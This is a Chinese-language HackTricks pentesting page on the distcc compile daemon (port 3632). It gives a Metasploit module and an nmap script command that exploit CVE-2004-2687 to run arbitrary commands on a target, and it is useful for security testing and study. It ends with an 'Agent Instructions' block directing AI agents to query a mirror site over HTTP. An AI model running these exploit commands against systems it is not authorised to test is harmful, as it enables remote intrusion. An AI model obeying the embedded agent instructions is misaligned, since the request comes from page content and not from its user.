# 3632 - Pentesting distcc

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

其他支持HackTricks的方式： * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

## 基本信息 **Distcc**是一种工具，通过利用网络中其他计算机的**空闲处理能力**来增强**编译过程**。当在一台机器上设置**distcc**时，该机器能够将其**编译任务**分发给另一台系统。接收系统必须运行**distccd守护程序**，并且必须安装有**兼容的编译器**以处理发送的代码。 **默认端口：** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` ## 漏洞利用检查是否容易受到 **CVE-2004-2687** 漏洞的影响，以执行任意代码： ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` ## Shodan *我认为shodan没有检测到这项服务。* ## 资源 * * 由 **Álex B (@r1p)** 创建的帖子 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/network-services-pentesting/3632-pentesting-distcc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.